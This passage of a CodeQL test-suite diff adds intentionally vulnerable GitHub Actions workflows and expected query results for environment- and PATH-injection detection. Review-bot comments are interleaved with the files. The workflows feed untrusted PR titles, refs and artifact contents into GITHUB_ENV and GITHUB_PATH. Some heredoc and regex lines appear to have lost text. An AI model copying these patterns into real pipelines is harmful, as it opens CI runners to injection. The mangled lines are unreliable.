@@ -0,0 +1,32 @@ +on: + schedule: + - cron: '0 0 * * *' + pull_request: + types: [ opened, synchronize, reopened ] + branches: ["master", "*-rc"] + workflow_dispatch: + +jobs: + tests: + runs-on: ubuntu-latest + steps: + - name: Checkout Repository + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + + - name: Set Branch Variables + id: set-branch-variables + env: + github_event_pull_request_head_repo_owner_login: ${{ github.event.pull_request.head.repo.owner.login }} + github_repository_owner: ${{ github.repository_owner }} + run: | + # Set the Repo Owner + REPO_OWNER="${github_event_pull_request_head_repo_owner_login:-$github_repository_owner}" + echo "REPO_OWNER=$REPO_OWNER" >> $GITHUB_ENV + - name: Sanitize Github Variables + id: sanitize-github-variables + env: + GITHUB_EVENT_PULL_REQUEST_TITLE: ${{ github.event.pull_request.title }} + run: | + # Delete non-alphanumeric characters and limit to 75 chars which is the branch title limit in GitHub + SAFE_PULL_REQUEST_TITLE=$(echo "${GITHUB_EVENT_PULL_REQUEST_TITLE}" | tr -cd '[:alnum:]_ -' | cut -c1-75) + echo "SAFE_PULL_REQUEST_TITLE=$SAFE_PULL_REQUEST_TITLE" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test19.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test19.yml new file mode 100644 index 000000000000..3b3b4b99ca10 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test19.yml 
@@ -0,0 +1,40 @@ +on: + pull_request: + workflow_dispatch: + +jobs: + build: + if: ${{ github.repository_owner == 'test' }} + runs-on: ubuntu-latest + steps: + - name: Get the appropriate Endo branch + id: branch + uses: actions/github-script@v7 + with: + result-encoding: string + script: |- + let branch = 'NOPE'; + if (context.payload.pull_request) { + const { body } = context.payload.pull_request; + const regex = /^\#endo-branch:\s+(\S+)/m; + const result = regex.exec(body); + if (result) { + branch = result[1]; + } + } + return branch; + - name: check out + id: checkout + if: steps.branch.outputs.result != 'NOPE' + uses: actions/checkout@v4 + with: + repository: test/test + path: ./tmp + ref: ${{ steps.branch.outputs.result }} + clean: 'false' + submodules: 'true' + persist-credentials: false + + - name: Find Netlify site ID + run: | + echo "NETLIFY_SITE_ID=$(cat COVERAGE_NETLIFY_SITE_ID)" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml new file mode 100644 index 000000000000..c902b7e61bd2 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml 
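Review bot: the attacker-influenced ref (a regex over the PR body) is checked out into `path: ./tmp`, but the final step runs `cat COVERAGE_NETLIFY_SITE_ID` from the workspace root, so the file it writes into `GITHUB_ENV` does not come from that checkout. Either the fixture means `cat ./tmp/COVERAGE_NETLIFY_SITE_ID`, or it is checking that the query does not connect the two, and a comment should say which. Note the trigger is `pull_request`, not `pull_request_target`, so this job runs with the fork's read-only token — relevant to which severity variant is expected to fire.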
@@ -0,0 +1,43 @@ +name: Test +on: + workflow_run: + workflows: ["Generate Preview"] + types: + - completed + +jobs: + test: + runs-on: ubuntu-latest + steps: + - name: 'Download artifact' + uses: actions/github-script@v3.1.0 + with: + script: | + var artifacts = await github.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: ${{ github.event.workflow_run.id }}, + }); + var matchPrArtifact = artifacts.data.artifacts.filter((artifact) => { + return artifact.name == "pr" + })[0]; + var matchPreviewArtifact = artifacts.data.artifacts.filter((artifact) => { + return artifact.name == "preview" + })[0]; + var downloadPr = await github.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchPrArtifact.id, + archive_format: 'zip', + }); + var downloadPreview = await github.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchPreviewArtifact.id, + archive_format: 'zip', + }); + var fs = require('fs'); + fs.writeFileSync('${{github.workspace}}/pr.zip', Buffer.from(downloadPr.data)); + - run: | + unzip pr.zip + echo "pr_number=$(cat NR)" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml new file mode 100644 index 000000000000..f76454c6088f --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml 
@@ -0,0 +1,23 @@ +name: Test +on: + workflow_run: + workflows: ['checks'] + types: + - completed + +jobs: + + test: + runs-on: ubuntu-latest + steps: + - name: Download PR metadata + uses: dawidd6/action-download-artifact@e6e25ac3a2b93187502a8be1ef9e9603afc34925 # v2.24.2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + workflow_conclusion: '' + name: pr_metadata + if_no_artifact_found: 'ignore' + - run: | + echo "PR_NUMBER=$(cat pr_number.txt | jq -r .)" >> $GITHUB_ENV + echo "PR_HEAD_REPO=$(cat pr_head_repo.txt | jq -Rr .)" >> $GITHUB_ENV + echo "PR_HEAD_REF=$(cat pr_head_ref.txt | jq -Rr .)" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml new file mode 100644 index 000000000000..7b30ec8b7e42 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml 
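Review bot: none of the three `jq` invocations removes newlines — `jq -r .` emits the decoded string verbatim and `jq -Rr .` passes each raw input line through — so all three `>> $GITHUB_ENV` writes remain injectable from the artifact, which is presumably the point of the fixture, but unlike test16 nothing says so. A `# VULNERABLE: jq -r / -Rr preserve newlines` comment above the run block would stop someone later "fixing" the fixture or modelling jq as a sanitizer. `if_no_artifact_found: 'ignore'` means the `cat`s run against missing files on a non-PR run; harmless here.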
@@ -0,0 +1,71 @@ +name: Test + +on: + pull_request_target: + +jobs: + test: + runs-on: ubuntu-latest + steps: + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + echo "PR_TITLE=$TITLE" >> $GITHUB_ENV + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + echo "PR_TITLE<> $GITHUB_ENV + echo "$TITLE" >> $GITHUB_ENV + echo "EOF" >> $GITHUB_ENV + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}" + echo "$TITLE" >> "${GITHUB_ENV}" + echo "EOF" >> "${GITHUB_ENV}" + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + cat <<-EOF >> "$GITHUB_ENV" + FOO=$TITLE + EOF + - env: + TITLE: ${{ github.event.pull_request.head.ref }} + run: | + echo "PR_TITLE=$TITLE" >> $GITHUB_ENV + - run: echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV + env: + TARGET_BRANCH: ${{ github.head_ref }} + - run: echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV + env: + TARGET_BRANCH: ${{ github.event.pull_request.title }} + - run: echo ISSUE_KEY=$(echo "${TITLE}" | grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV + env: + TITLE: ${{ github.event.pull_request.title }} + - env: + TITLE: |- + ${{ github.event.pull_request.title }} + run: | + cat > issue.txt << EOL + ${TITLE} + EOL + echo REPO_NAME=$(cat issue.txt | sed 's/\r/\n/g' | grep -ioE '\s*[a-z0-9_-]+/[a-z0-9_-]+\s*$' | tr -d ' ') >> $GITHUB_ENV + + + diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml new file mode 100644 index 000000000000..cfc5e6ef1fa5 --- /dev/null 
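Review bot: three steps in this hunk read as if angle-bracket text was dropped: `echo "PR_TITLE<> $GITHUB_ENV`, `echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"` and `echo 'JSON_RESPONSE<> "$GITHUB_ENV"` are each followed by an `EOF` terminator, so they were presumably `<<EOF` heredoc openers, and `grep -oP 'ISPN-(?P[0-9]+)'` is not valid PCRE without a group name (`(?P<id>[0-9]+)`). If this is only how the page renders there is nothing to do; if the committed file really contains these lines, those steps are no longer the multi-line GITHUB_ENV writes they are meant to exercise and the grep step fails at runtime. Worth checking the committed file against the expected results before relying on this fixture.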
+++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml @@ -0,0 +1,36 @@ +name: Test +on: + workflow_run: + workflows: ["Build/Test"] + types: [completed] +jobs: + test: + runs-on: ubuntu-latest + steps: + - name: 'Download code coverage' + uses: actions/github-script@v7 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "oc-code-coverage" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/oc-code-coverage.zip`, Buffer.from(download.data)); + - name: 'Unzip code coverage' + run: unzip oc-code-coverage.zip -d coverage + - name: set env vars + run: | + echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV + echo "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV + echo "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml new file mode 100644 index 000000000000..36340258515e --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml 
@@ -0,0 +1,28 @@ +name: Test + +on: + pull_request_target: + +jobs: + test: + runs-on: ubuntu-latest + steps: + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + FOO=${TITLE##*/} + echo PR_TITLE=${FOO} >> $GITHUB_ENV + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + FOO=$TITLE+ + echo PR_TITLE=$FOO >> $GITHUB_ENV + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + venv="$(echo $TITLE)')" + echo "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV + + + + diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml new file mode 100644 index 000000000000..c33c90dbb9c6 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml @@ -0,0 +1,25 @@ +# Second Workflow +# It consumes an artifact produced by the First Workflow + +on: workflow_run +jobs: + my-second-job: + runs-on: ubuntu-latest + steps: + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{github.event.workflow_run.workflow_id}} + run_id: ${{github.event.workflow_run.id}} + name: artifact + + - name: Load .env file + uses: aarcangeli/load-dotenv@v1.0.0 + with: + path: 'backend/new' + filenames: | + .env + .env.test + quiet: false + if-file-not-found: error + diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml new file mode 100644 index 000000000000..806f8dc8e45c --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml 
@@ -0,0 +1,39 @@ +name: Tests + +on: + workflow_run: + workflows: ["tests"] + types: + - completed + +permissions: { contents: read } + +jobs: + unit-test-results: + name: Test + runs-on: ubuntu-latest + permissions: + actions: write + statuses: write + checks: write + pull-requests: write + contents: write + steps: + - uses: actions/checkout@v4 + + - name: Download and Extract Artifacts + uses: dawidd6/action-download-artifact@v6 + with: + run_id: ${{ github.event.workflow_run.id }} + path: ./artifacts + + - name: assignment + run: | + foo=$(cat ./artifacts/parent-artifacts/event.txt) + echo "foo=$foo" >> $GITHUB_ENV + - name: direct 1 + run: | + echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV + - name: direct 2 + run: | + echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml new file mode 100644 index 000000000000..3ed80374ef65 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml 
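Review bot: the `direct 2` step reads `/artifacts/parent-artifacts/event.txt` (an absolute path) whereas the download step extracts to `./artifacts`, so unlike `assignment` and `direct 1` it does not read the downloaded artifact at all. If it is meant as a third positive case it should be `$(< ./artifacts/parent-artifacts/event.txt)`; if it is meant to check that an unrelated absolute path is not treated as artifact-derived, a comment on the step should say so, since the expected file is the only place the intent is currently recorded.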
@@ -0,0 +1,41 @@ +name: tests + +on: + workflow_run: + workflows: ["Tests"] + types: + - completed + +permissions: { contents: read } + +jobs: + get-artifacts: + name: Get required artifacts + runs-on: ubuntu-latest + permissions: + actions: read + statuses: write + steps: + - name: Download and extract event file + uses: actions/download-artifact@v4 + with: + github-token: ${{ secrets.GITHUB_TOKEN }} + run-id: ${{ github.event.workflow_run.id }} + name: event_file + path: artifacts/event_file + + - name: Try to read PR number + id: set-ref + run: | + pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json) + if [ -z "$pr_num" ] || [ "$pr_num" == "null" ]; then + pr_num="" + fi + + ref=$pr_num + if [ -z "$ref" ] || [ "$ref" == "null" ]; then + ref=${{ github.ref }} + fi + + echo "pr_num=$pr_num" >> $GITHUB_ENV + echo "ref=$ref" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected new file mode 100644 index 000000000000..f544994fc5c1 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected 
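Review bot: after the first `if` normalises `pr_num` to an empty string, `ref=$pr_num` can never equal `null`, so `|| [ "$ref" == "null" ]` is dead, and the fallback `ref=${{ github.ref }}` is expression-interpolated into the shell where `ref="$GITHUB_REF"` would do. Neither changes what the query should see — `pr_num` still comes from an attacker-writable `event.json` via `jq -r`, which does not strip newlines — so a `# VULNERABLE` marker on the `set-ref` step would record the expected result for both env writes.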
@@ -0,0 +1,24 @@ +edges +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | Config | +nodes +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | semmle.label | echo $(echo "$PATHINJ") >> $GITHUB_PATH | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | semmle.label | echo $PATHINJ >> $GITHUB_PATH | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | semmle.label | echo ${PATHINJ} >> $GITHUB_PATH | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | semmle.label | echo "$(cat foo/bar)" >> $GITHUB_PATH | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | semmle.label | 
github.event.pull_request.title | +| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | semmle.label | echo "::add-path::$PATHINJ" | +subpaths +#select +| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref new file mode 100644 index 000000000000..80f72124fe45 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref @@ -0,0 +1 @@ +Security/CWE-077/EnvPathInjectionCritical.ql diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected new file mode 100644 index 000000000000..5be9f729ad64 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected 
@@ -0,0 +1,19 @@ +edges +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | Config | +nodes +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | semmle.label | echo $(echo "$PATHINJ") >> $GITHUB_PATH | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | semmle.label | echo $PATHINJ >> $GITHUB_PATH | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | semmle.label | echo ${PATHINJ} >> $GITHUB_PATH | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | semmle.label | echo "$(cat foo/bar)" >> $GITHUB_PATH | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | semmle.label | 
github.event.pull_request.title |
+| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | semmle.label | echo "::add-path::$PATHINJ" |
+subpaths
+#select
diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref
new file mode 100644
index 000000000000..165a3d20896b
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref
@@ -0,0 +1 @@
+Security/CWE-077/EnvPathInjectionMedium.ql
diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected
new file mode 100644
index 000000000000..9914ae91df12
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected
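Review bot: The `#select` section of EnvPathInjectionMedium.expected is empty, so the Medium query reports nothing on path1.yml and this test only pins a negative result for it; every sink flagged in the Critical sibling is attributed to `pull_request_target` (the `path1.yml:4:3:4:21` column), which presumably is what routes all five cases to the Critical query rather than to Medium. If the Medium variant is meant to cover the same `$GITHUB_PATH` / `::add-path::` sinks under a non-privileged trigger, a second test workflow triggered by `pull_request` with a single `echo "$PATHINJ" >> $GITHUB_PATH` step would give Medium at least one positive row and would catch a regression where it silently stops matching. A comment at the top of the test workflow stating which query each case is expected to hit, e.g. `# expected: EnvPathInjectionCritical only (privileged trigger); EnvPathInjectionMedium must stay empty`, would also make the empty `#select` here read as intentional rather than as a missing result.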
@@ -0,0 +1,131 @@ +edges +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | provenance | Config | +| 
.github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | provenance | Config | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | Config | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | Config | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test7.yml:9:9:16:6 | Uses 
Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | provenance | Config | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> 